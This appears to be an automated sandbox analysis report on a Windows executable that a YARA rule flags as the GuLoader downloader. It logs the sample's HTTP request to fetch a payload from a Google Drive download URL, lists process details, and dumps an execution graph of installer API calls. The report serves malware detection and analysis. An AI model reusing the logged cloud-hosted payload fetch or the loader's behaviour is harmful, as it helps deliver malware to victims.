                                                      85 | 192.168.2.11 | 50065 | 142.250.184.225 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:07:37 UTC | 466 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:37 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgQYsitrk7M_hOWuHD9TZcQS9bg28596iS2e1xQb7L5hgTRAqzMWwkGFFjMJyDowChgc
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:37 GMT
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-t3WNlEsGsc5xQtNeaaTF5w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:07:37 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="zVilFD1rwAT484NvMlyVKg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Target ID:0
                                                      Start time:23:05:31
                                                      Start date:10/01/2025
                                                      Path:C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\QNuQ5e175D.exe"
                                                      Imagebase:0x400000
                                                      File size:585'064 bytes
                                                      MD5 hash:9BB2CDB8508EE2255A35ECEC43462A48
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1535894824.000000000446C000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:3
                                                      Start time:23:05:54
                                                      Start date:10/01/2025
                                                      Path:C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\QNuQ5e175D.exe"
                                                      Imagebase:0x400000
                                                      File size:585'064 bytes
                                                      MD5 hash:9BB2CDB8508EE2255A35ECEC43462A48
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.2559418196.00000000017EC000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:false

                                                        Execution Graph

                                                        Execution Coverage:22.3%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:16%
                                                        Total number of Nodes:1575
                                                        Total number of Limit Nodes:40
4964 73b022b1 LoadLibraryW 4960->4964 4965 73b022c6 4960->4965 4961->4910 4962->4966 4963->4955 4964->4961 4964->4965 5053 73b016bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4965->5053 4966->4955 5052 73b012bb GlobalAlloc 4968->5052 4969 73b02318 4969->4961 4971 73b02325 lstrlenW 4969->4971 5054 73b016bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4971->5054 4973 73b022d8 4973->4969 4982 73b02302 GetProcAddress 4973->4982 4975->4955 4976->4961 4981 73b02216 lstrcpyW 4976->4981 4977 73b0233f 4977->4961 4978->4955 4979->4955 5047 73b0162f GlobalSize GlobalAlloc 4979->5047 4981->4961 4982->4969 4983 73b0212f 4983->4910 4985 73b02498 4984->4985 4987 73b025c1 GlobalFree 4985->4987 4989 73b02540 GlobalAlloc WideCharToMultiByte 4985->4989 4990 73b0256b GlobalAlloc 4985->4990 4991 73b012cc GlobalAlloc lstrcpynW 4985->4991 4992 73b02582 4985->4992 5056 73b0135a 4985->5056 4987->4985 4988 73b0186f 4987->4988 4988->4920 4988->4921 4988->4934 4989->4987 4990->4992 4991->4985 4992->4987 5060 73b027a4 4992->5060 4996 73b02baa 4994->4996 4995 73b02c4f CreateFileA 4999 73b02c6d 4995->4999 4996->4995 4998 73b02d39 4998->4934 5063 73b02b42 4999->5063 5001 73b02453 5000->5001 5002 73b0245e GlobalAlloc 5001->5002 5003 73b01868 5001->5003 5002->5001 5003->4913 5008 73b02840 5004->5008 5005 73b028db GlobalAlloc 5009 73b028fe 5005->5009 5006 73b028ee 5007 73b028f4 GlobalSize 5006->5007 5006->5009 5007->5009 5008->5005 5008->5006 5009->4938 5011 73b02e2e 5010->5011 5012 73b02e6e GlobalFree 5011->5012 5067 73b012bb GlobalAlloc 5013->5067 5015 73b0265f 5016 73b026d8 MultiByteToWideChar 5015->5016 5017 73b026fa StringFromGUID2 5015->5017 5018 73b0270b lstrcpynW 5015->5018 5019 73b0271e wsprintfW 5015->5019 5020 73b02742 GlobalFree 5015->5020 5021 73b02777 GlobalFree 5015->5021 5022 73b01312 2 API calls 5015->5022 5068 73b01381 5015->5068 5016->5015 5017->5015 5018->5015 5019->5015 5020->5015 5021->4927 5022->5015 5072 
73b012bb GlobalAlloc 5024->5072 5026 73b01659 5027 73b01666 2 API calls 5026->5027 5028 73b01663 5027->5028 5029 73b01312 5028->5029 5030 73b01355 GlobalFree 5029->5030 5031 73b0131b GlobalAlloc lstrcpynW 5029->5031 5030->4932 5031->5030 5033 73b01672 wsprintfW 5032->5033 5035 73b0169f lstrcpyW 5032->5035 5037 73b016b8 5033->5037 5035->5037 5037->4939 5039 73b02626 5038->5039 5041 73b01931 5038->5041 5040 73b02642 GlobalFree 5039->5040 5039->5041 5040->5039 5041->4945 5041->4946 5043 73b01312 2 API calls 5042->5043 5044 73b015fe 5043->5044 5044->4948 5045->4952 5046->4955 5048 73b0164d 5047->5048 5048->4979 5055 73b012bb GlobalAlloc 5049->5055 5051 73b012db lstrcpynW 5051->4961 5052->4983 5053->4973 5054->4977 5055->5051 5057 73b01361 5056->5057 5058 73b012cc 2 API calls 5057->5058 5059 73b0137f 5058->5059 5059->4985 5061 73b027b2 VirtualAlloc 5060->5061 5062 73b02808 5060->5062 5061->5062 5062->4992 5064 73b02b4d 5063->5064 5065 73b02b52 GetLastError 5064->5065 5066 73b02b5d 5064->5066 5065->5066 5066->4998 5067->5015 5069 73b0138a 5068->5069 5070 73b013ac 5068->5070 5069->5070 5071 73b01390 lstrcpyW 5069->5071 5070->5015 5071->5070 5072->5026 5430 73b0170d 5431 73b015b6 GlobalFree 5430->5431 5433 73b01725 5431->5433 5432 73b0176b GlobalFree 5433->5432 5434 73b01740 5433->5434 5435 73b01757 VirtualFree 5433->5435 5434->5432 5435->5432 5436 402b7e 5437 402bd0 5436->5437 5438 402b85 5436->5438 5439 40696b 5 API calls 5437->5439 5440 402bce 5438->5440 5442 402da9 21 API calls 5438->5442 5441 402bd7 5439->5441 5444 402dcb 21 API calls 5441->5444 5443 402b93 5442->5443 5445 402da9 21 API calls 5443->5445 5446 402be0 5444->5446 5449 402b9f 5445->5449 5446->5440 5447 402be4 IIDFromString 5446->5447 5447->5440 5448 402bf3 5447->5448 5448->5440 5454 406577 lstrcpynW 5448->5454 5453 4064be wsprintfW 5449->5453 5451 402c10 CoTaskMemFree 5451->5440 5453->5440 5454->5451 5455 401000 5456 401037 BeginPaint GetClientRect 5455->5456 5457 40100c DefWindowProcW 5455->5457 5459 
4010f3 5456->5459 5460 401179 5457->5460 5461 401073 CreateBrushIndirect FillRect DeleteObject 5459->5461 5462 4010fc 5459->5462 5461->5459 5463 401102 CreateFontIndirectW 5462->5463 5464 401167 EndPaint 5462->5464 5463->5464 5465 401112 6 API calls 5463->5465 5464->5460 5465->5464 4018 401781 4024 402dcb 4018->4024 4022 40178f 4023 406096 2 API calls 4022->4023 4023->4022 4025 402dd7 4024->4025 4026 4065b4 21 API calls 4025->4026 4027 402df8 4026->4027 4028 401788 4027->4028 4029 406825 5 API calls 4027->4029 4030 406096 4028->4030 4029->4028 4031 4060a3 GetTickCount GetTempFileNameW 4030->4031 4032 4060d9 4031->4032 4033 4060dd 4031->4033 4032->4031 4032->4033 4033->4022 5466 401d82 5467 402da9 21 API calls 5466->5467 5468 401d93 SetWindowLongW 5467->5468 5469 402c4f 5468->5469 4054 401f03 4055 402da9 21 API calls 4054->4055 4056 401f09 4055->4056 4057 402da9 21 API calls 4056->4057 4058 401f15 4057->4058 4059 401f21 ShowWindow 4058->4059 4060 401f2c EnableWindow 4058->4060 4061 402c4f 4059->4061 4060->4061 5470 401503 5471 401508 5470->5471 5473 40152e 5470->5473 5472 402da9 21 API calls 5471->5472 5472->5473 5474 402903 5475 40290b 5474->5475 5476 40290f FindNextFileW 5475->5476 5478 402921 5475->5478 5477 402968 5476->5477 5476->5478 5480 406577 lstrcpynW 5477->5480 5480->5478 5481 73b01774 5482 73b017a3 5481->5482 5483 73b01bff 22 API calls 5482->5483 5484 73b017aa 5483->5484 5485 73b017b1 5484->5485 5486 73b017bd 5484->5486 5487 73b01312 2 API calls 5485->5487 5488 73b017e4 5486->5488 5489 73b017c7 5486->5489 5492 73b017bb 5487->5492 5490 73b017ea 5488->5490 5491 73b0180e 5488->5491 5493 73b015dd 3 API calls 5489->5493 5494 73b01654 3 API calls 5490->5494 5495 73b015dd 3 API calls 5491->5495 5496 73b017cc 5493->5496 5497 73b017ef 5494->5497 5495->5492 5498 73b01654 3 API calls 5496->5498 5500 73b01312 2 API calls 5497->5500 5499 73b017d2 5498->5499 5501 73b01312 2 API calls 5499->5501 5502 73b017f5 GlobalFree 5500->5502 5503 73b017d8 GlobalFree 5501->5503 
5502->5492 5504 73b01809 GlobalFree 5502->5504 5503->5492 5504->5492 5505 403c07 5506 403c12 5505->5506 5507 403c16 5506->5507 5508 403c19 GlobalAlloc 5506->5508 5508->5507 5509 401588 5510 402bc9 5509->5510 5513 4064be wsprintfW 5510->5513 5512 402bce 5513->5512 5514 73b01979 5515 73b0199c 5514->5515 5516 73b019d1 GlobalFree 5515->5516 5517 73b019e3 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5515->5517 5516->5517 5518 73b01312 2 API calls 5517->5518 5519 73b01b6e GlobalFree GlobalFree 5518->5519 5520 40198d 5521 402da9 21 API calls 5520->5521 5522 401994 5521->5522 5523 402da9 21 API calls 5522->5523 5524 4019a1 5523->5524 5525 402dcb 21 API calls 5524->5525 5526 4019b8 lstrlenW 5525->5526 5528 4019c9 5526->5528 5527 401a0a 5528->5527 5532 406577 lstrcpynW 5528->5532 5530 4019fa 5530->5527 5531 4019ff lstrlenW 5530->5531 5531->5527 5532->5530 4117 73b02a7f 4118 73b02acf 4117->4118 4119 73b02a8f VirtualProtect 4117->4119 4119->4118 5533 40168f 5534 402dcb 21 API calls 5533->5534 5535 401695 5534->5535 5536 4068d4 2 API calls 5535->5536 5537 40169b 5536->5537 5538 402b10 5539 402da9 21 API calls 5538->5539 5540 402b16 5539->5540 5541 4065b4 21 API calls 5540->5541 5542 402953 5540->5542 5541->5542 4120 402711 4121 402da9 21 API calls 4120->4121 4130 402720 4121->4130 4122 40285d 4123 40276a ReadFile 4123->4122 4123->4130 4124 402803 4124->4122 4124->4130 4134 406148 SetFilePointer 4124->4134 4126 4027aa MultiByteToWideChar 4126->4130 4127 40285f 4145 4064be wsprintfW 4127->4145 4130->4122 4130->4123 4130->4124 4130->4126 4130->4127 4131 4027d0 SetFilePointer MultiByteToWideChar 4130->4131 4132 402870 4130->4132 4143 4060ea ReadFile 4130->4143 4131->4130 4132->4122 4133 402891 SetFilePointer 4132->4133 4133->4122 4135 406164 4134->4135 4138 40617c 4134->4138 4136 4060ea ReadFile 4135->4136 4137 406170 4136->4137 4137->4138 4139 406185 SetFilePointer 4137->4139 4140 4061ad SetFilePointer 4137->4140 4138->4124 4139->4140 4141 406190 4139->4141 4140->4138 4146 
406119 WriteFile 4141->4146 4144 406108 4143->4144 4144->4130 4145->4122 4147 406137 4146->4147 4147->4138 5543 401491 5544 4055fc 28 API calls 5543->5544 5545 401498 5544->5545 5546 73b010e1 5547 73b01111 5546->5547 5548 73b012b0 GlobalFree 5547->5548 5549 73b01240 GlobalFree 5547->5549 5550 73b011d7 GlobalAlloc 5547->5550 5551 73b0135a 2 API calls 5547->5551 5552 73b012ab 5547->5552 5553 73b01312 2 API calls 5547->5553 5554 73b0129a GlobalFree 5547->5554 5555 73b01381 lstrcpyW 5547->5555 5556 73b0116b GlobalAlloc 5547->5556 5549->5547 5550->5547 5551->5547 5552->5548 5553->5547 5554->5547 5555->5547 5556->5547 4550 401794 4551 402dcb 21 API calls 4550->4551 4552 40179b 4551->4552 4553 4017c3 4552->4553 4554 4017bb 4552->4554 4591 406577 lstrcpynW 4553->4591 4590 406577 lstrcpynW 4554->4590 4557 4017c1 4561 406825 5 API calls 4557->4561 4558 4017ce 4559 405e46 3 API calls 4558->4559 4560 4017d4 lstrcatW 4559->4560 4560->4557 4578 4017e0 4561->4578 4562 4068d4 2 API calls 4562->4578 4563 40181c 4564 406042 2 API calls 4563->4564 4564->4578 4566 4017f2 CompareFileTime 4566->4578 4567 4018b2 4569 4055fc 28 API calls 4567->4569 4568 401889 4571 4055fc 28 API calls 4568->4571 4579 40189e 4568->4579 4570 4018bc 4569->4570 4572 4032d9 35 API calls 4570->4572 4571->4579 4574 4018cf 4572->4574 4573 406577 lstrcpynW 4573->4578 4575 4018e3 SetFileTime 4574->4575 4577 4018f5 CloseHandle 4574->4577 4575->4577 4576 4065b4 21 API calls 4576->4578 4577->4579 4580 401906 4577->4580 4578->4562 4578->4563 4578->4566 4578->4567 4578->4568 4578->4573 4578->4576 4586 405bd7 MessageBoxIndirectW 4578->4586 4589 406067 GetFileAttributesW CreateFileW 4578->4589 4581 40190b 4580->4581 4582 40191e 4580->4582 4584 4065b4 21 API calls 4581->4584 4583 4065b4 21 API calls 4582->4583 4585 401926 4583->4585 4587 401913 lstrcatW 4584->4587 4585->4579 4588 405bd7 MessageBoxIndirectW 4585->4588 4586->4578 4587->4585 4588->4579 4589->4578 4590->4557 4591->4558 5557 401a97 5558 402da9 21 API calls 
5557->5558 5559 401aa0 5558->5559 5560 402da9 21 API calls 5559->5560 5561 401a45 5560->5561 4597 401598 4598 4015b1 4597->4598 4599 4015a8 ShowWindow 4597->4599 4600 402c4f 4598->4600 4601 4015bf ShowWindow 4598->4601 4599->4598 4601->4600 4633 402419 4634 402dcb 21 API calls 4633->4634 4635 402428 4634->4635 4636 402dcb 21 API calls 4635->4636 4637 402431 4636->4637 4638 402dcb 21 API calls 4637->4638 4639 40243b GetPrivateProfileStringW 4638->4639 5562 73b023e9 5563 73b02453 5562->5563 5564 73b0245e GlobalAlloc 5563->5564 5565 73b0247d 5563->5565 5564->5563 5566 40201b 5567 402dcb 21 API calls 5566->5567 5568 402022 5567->5568 5569 4068d4 2 API calls 5568->5569 5570 402028 5569->5570 5572 402039 5570->5572 5573 4064be wsprintfW 5570->5573 5573->5572 5574 401b9c 5575 402dcb 21 API calls 5574->5575 5576 401ba3 5575->5576 5577 402da9 21 API calls 5576->5577 5578 401bac wsprintfW 5577->5578 5579 402c4f 5578->5579 4640 405b9d ShellExecuteExW 5580 40149e 5581 4023c2 5580->5581 5582 4014ac PostQuitMessage 5580->5582 5582->5581 4641 4016a0 4642 402dcb 21 API calls 4641->4642 4643 4016a7 4642->4643 4644 402dcb 21 API calls 4643->4644 4645 4016b0 4644->4645 4646 402dcb 21 API calls 4645->4646 4647 4016b9 MoveFileW 4646->4647 4648 4016cc 4647->4648 4654 4016c5 4647->4654 4649 4068d4 2 API calls 4648->4649 4652 40231b 4648->4652 4651 4016db 4649->4651 4651->4652 4653 406337 40 API calls 4651->4653 4653->4654 4655 401423 4654->4655 4656 4055fc 28 API calls 4655->4656 4657 401431 4656->4657 4657->4652 5583 4049a0 5584 4049b0 5583->5584 5585 4049d6 5583->5585 5587 4044f6 22 API calls 5584->5587 5586 40455d 8 API calls 5585->5586 5588 4049e2 5586->5588 5589 4049bd SetDlgItemTextW 5587->5589 5589->5585 4658 402324 4659 402dcb 21 API calls 4658->4659 4660 40232a 4659->4660 4661 402dcb 21 API calls 4660->4661 4662 402333 4661->4662 4663 402dcb 21 API calls 4662->4663 4664 40233c 4663->4664 4665 4068d4 2 API calls 4664->4665 4666 402345 4665->4666 4667 402356 lstrlenW lstrlenW 
4666->4667 4671 402349 4666->4671 4669 4055fc 28 API calls 4667->4669 4668 4055fc 28 API calls 4672 402351 4668->4672 4670 402394 SHFileOperationW 4669->4670 4670->4671 4670->4672 4671->4668 4671->4672 5590 401a24 5591 402dcb 21 API calls 5590->5591 5592 401a2b 5591->5592 5593 402dcb 21 API calls 5592->5593 5594 401a34 5593->5594 5595 401a3b lstrcmpiW 5594->5595 5596 401a4d lstrcmpW 5594->5596 5597 401a41 5595->5597 5596->5597 5598 401da6 5599 401db9 GetDlgItem 5598->5599 5600 401dac 5598->5600 5602 401db3 5599->5602 5601 402da9 21 API calls 5600->5601 5601->5602 5603 401dfa GetClientRect LoadImageW SendMessageW 5602->5603 5604 402dcb 21 API calls 5602->5604 5606 401e58 5603->5606 5608 401e64 5603->5608 5604->5603 5607 401e5d DeleteObject 5606->5607 5606->5608 5607->5608 5609 4023a8 5610 4023c2 5609->5610 5611 4023af 5609->5611 5612 4065b4 21 API calls 5611->5612 5613 4023bc 5612->5613 5613->5610 5614 405bd7 MessageBoxIndirectW 5613->5614 5614->5610 5615 73b01058 5617 73b01074 5615->5617 5616 73b010dd 5617->5616 5618 73b015b6 GlobalFree 5617->5618 5619 73b01092 5617->5619 5618->5619 5620 73b015b6 GlobalFree 5619->5620 5621 73b010a2 5620->5621 5622 73b010b2 5621->5622 5623 73b010a9 GlobalSize 5621->5623 5624 73b010b6 GlobalAlloc 5622->5624 5625 73b010c7 5622->5625 5623->5622 5626 73b015dd 3 API calls 5624->5626 5627 73b010d2 GlobalFree 5625->5627 5626->5625 5627->5616 5628 402c2a SendMessageW 5629 402c44 InvalidateRect 5628->5629 5630 402c4f 5628->5630 5629->5630 5631 40462c lstrcpynW lstrlenW 4699 4024af 4700 402dcb 21 API calls 4699->4700 4701 4024c1 4700->4701 4702 402dcb 21 API calls 4701->4702 4703 4024cb 4702->4703 4716 402e5b 4703->4716 4706 402c4f 4707 402503 4710 402da9 21 API calls 4707->4710 4712 40250f 4707->4712 4708 402dcb 21 API calls 4709 4024f9 lstrlenW 4708->4709 4709->4707 4710->4712 4711 40252e RegSetValueExW 4714 402544 RegCloseKey 4711->4714 4712->4711 4713 4032d9 35 API calls 4712->4713 4713->4711 4714->4706 4717 402e76 4716->4717 4720 406412 
4717->4720 4721 406421 4720->4721 4722 4024db 4721->4722 4723 40642c RegCreateKeyExW 4721->4723 4722->4706 4722->4707 4722->4708 4723->4722 5632 402930 5633 402dcb 21 API calls 5632->5633 5634 402937 FindFirstFileW 5633->5634 5635 40295f 5634->5635 5639 40294a 5634->5639 5636 402968 5635->5636 5640 4064be wsprintfW 5635->5640 5641 406577 lstrcpynW 5636->5641 5640->5636 5641->5639 5642 401931 5643 401968 5642->5643 5644 402dcb 21 API calls 5643->5644 5645 40196d 5644->5645 5646 405c83 71 API calls 5645->5646 5647 401976 5646->5647 5648 73b02d43 5649 73b02d5b 5648->5649 5650 73b0162f 2 API calls 5649->5650 5651 73b02d76 5650->5651 5652 401934 5653 402dcb 21 API calls 5652->5653 5654 40193b 5653->5654 5655 405bd7 MessageBoxIndirectW 5654->5655 5656 401944 5655->5656 5657 4046b5 5658 4047e7 5657->5658 5659 4046cd 5657->5659 5660 404851 5658->5660 5662 40491b 5658->5662 5668 404822 GetDlgItem SendMessageW 5658->5668 5665 4044f6 22 API calls 5659->5665 5661 40485b GetDlgItem 5660->5661 5660->5662 5663 404875 5661->5663 5664 4048dc 5661->5664 5667 40455d 8 API calls 5662->5667 5663->5664 5671 40489b SendMessageW LoadCursorW SetCursor 5663->5671 5664->5662 5672 4048ee 5664->5672 5666 404734 5665->5666 5669 4044f6 22 API calls 5666->5669 5670 404916 5667->5670 5690 404518 KiUserCallbackDispatcher 5668->5690 5674 404741 CheckDlgButton 5669->5674 5691 404964 5671->5691 5676 404904 5672->5676 5677 4048f4 SendMessageW 5672->5677 5688 404518 KiUserCallbackDispatcher 5674->5688 5676->5670 5682 40490a SendMessageW 5676->5682 5677->5676 5678 40484c 5679 404940 SendMessageW 5678->5679 5679->5660 5682->5670 5683 40475f GetDlgItem 5689 40452b SendMessageW 5683->5689 5685 404775 SendMessageW 5686 404792 GetSysColor 5685->5686 5687 40479b SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5685->5687 5686->5687 5687->5670 5688->5683 5689->5685 5690->5678 5694 405b9d ShellExecuteExW 5691->5694 5693 4048ca LoadCursorW SetCursor 5693->5664 5694->5693 4724 4028b6 4725 4028bd 
4724->4725 4726 402bce 4724->4726 4727 402da9 21 API calls 4725->4727 4728 4028c4 4727->4728 4729 4028d3 SetFilePointer 4728->4729 4729->4726 4730 4028e3 4729->4730 4732 4064be wsprintfW 4730->4732 4732->4726 5695 401f37 5696 402dcb 21 API calls 5695->5696 5697 401f3d 5696->5697 5698 402dcb 21 API calls 5697->5698 5699 401f46 5698->5699 5700 402dcb 21 API calls 5699->5700 5701 401f4f 5700->5701 5702 402dcb 21 API calls 5701->5702 5703 401f58 5702->5703 5704 401423 28 API calls 5703->5704 5705 401f5f 5704->5705 5712 405b9d ShellExecuteExW 5705->5712 5707 401fa7 5708 406a16 5 API calls 5707->5708 5710 402953 5707->5710 5709 401fc4 CloseHandle 5708->5709 5709->5710 5712->5707 5713 4014b8 5714 4014be 5713->5714 5715 401389 2 API calls 5714->5715 5716 4014c6 5715->5716 5717 402fb8 5718 402fe3 5717->5718 5719 402fca SetTimer 5717->5719 5720 403038 5718->5720 5721 402ffd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5718->5721 5719->5718 5721->5720 4829 40573b 4830 4058e5 4829->4830 4831 40575c GetDlgItem GetDlgItem GetDlgItem 4829->4831 4833 405916 4830->4833 4834 4058ee GetDlgItem CreateThread CloseHandle 4830->4834 4875 40452b SendMessageW 4831->4875 4835 405941 4833->4835 4839 405966 4833->4839 4840 40592d ShowWindow ShowWindow 4833->4840 4834->4833 4878 4056cf 5 API calls 4834->4878 4836 4059a1 4835->4836 4837 40594d 4835->4837 4836->4839 4852 4059af SendMessageW 4836->4852 4841 405955 4837->4841 4842 40597b ShowWindow 4837->4842 4838 4057cc 4844 4057d3 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4838->4844 4843 40455d 8 API calls 4839->4843 4877 40452b SendMessageW 4840->4877 4846 4044cf SendMessageW 4841->4846 4848 40599b 4842->4848 4849 40598d 4842->4849 4847 405974 4843->4847 4850 405841 4844->4850 4851 405825 SendMessageW SendMessageW 4844->4851 4846->4839 4854 4044cf SendMessageW 4848->4854 4853 4055fc 28 API calls 4849->4853 4855 405854 4850->4855 4856 405846 SendMessageW 4850->4856 4851->4850 4852->4847 4857 4059c8 CreatePopupMenu 4852->4857 
4853->4848 4854->4836 4859 4044f6 22 API calls 4855->4859 4856->4855 4858 4065b4 21 API calls 4857->4858 4860 4059d8 AppendMenuW 4858->4860 4861 405864 4859->4861 4862 4059f5 GetWindowRect 4860->4862 4863 405a08 TrackPopupMenu 4860->4863 4864 4058a1 GetDlgItem SendMessageW 4861->4864 4865 40586d ShowWindow 4861->4865 4862->4863 4863->4847 4866 405a23 4863->4866 4864->4847 4869 4058c8 SendMessageW SendMessageW 4864->4869 4867 405890 4865->4867 4868 405883 ShowWindow 4865->4868 4870 405a3f SendMessageW 4866->4870 4876 40452b SendMessageW 4867->4876 4868->4867 4869->4847 4870->4870 4871 405a5c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4870->4871 4873 405a81 SendMessageW 4871->4873 4873->4873 4874 405aaa GlobalUnlock SetClipboardData CloseClipboard 4873->4874 4874->4847 4875->4838 4876->4864 4877->4835 5722 401d3c 5723 402da9 21 API calls 5722->5723 5724 401d42 IsWindow 5723->5724 5725 401a45 5724->5725 5726 404d3d 5727 404d69 5726->5727 5728 404d4d 5726->5728 5730 404d9c 5727->5730 5731 404d6f SHGetPathFromIDListW 5727->5731 5737 405bbb GetDlgItemTextW 5728->5737 5733 404d7f 5731->5733 5736 404d86 SendMessageW 5731->5736 5732 404d5a SendMessageW 5732->5727 5734 40140b 2 API calls 5733->5734 5734->5736 5736->5730 5737->5732

                                                        Control-flow Graph (entry block 403552-4035a4; legend: Executed / Not Executed)
                                                        APIs
                                                        • SetErrorMode.KERNELBASE ref: 00403575
                                                        • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 004035A0
                                                        • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 004035B3
                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040364C
                                                        • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403689
                                                        • OleInitialize.OLE32(00000000), ref: 00403690
                                                        • SHGetFileInfoW.SHELL32(0042AA28,00000000,?,000002B4,00000000), ref: 004036AF
                                                        • GetCommandLineW.KERNEL32(00433700,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004036C4
                                                        • CharNextW.USER32(00000000,"C:\Users\user\Desktop\QNuQ5e175D.exe",00000020,"C:\Users\user\Desktop\QNuQ5e175D.exe",00000000,?,00000008,0000000A,0000000C), ref: 004036FD
                                                        • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403835
                                                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403846
                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403852
                                                        • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403866
                                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040386E
                                                        • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040387F
                                                        • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403887
                                                        • DeleteFileW.KERNELBASE(1033,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040389B
                                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\QNuQ5e175D.exe",00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403974
                                                          • Part of subcall function 00406577: lstrcpynW.KERNEL32(?,?,00000400,004036C4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406584
                                                        • wsprintfW.USER32 ref: 004039D1
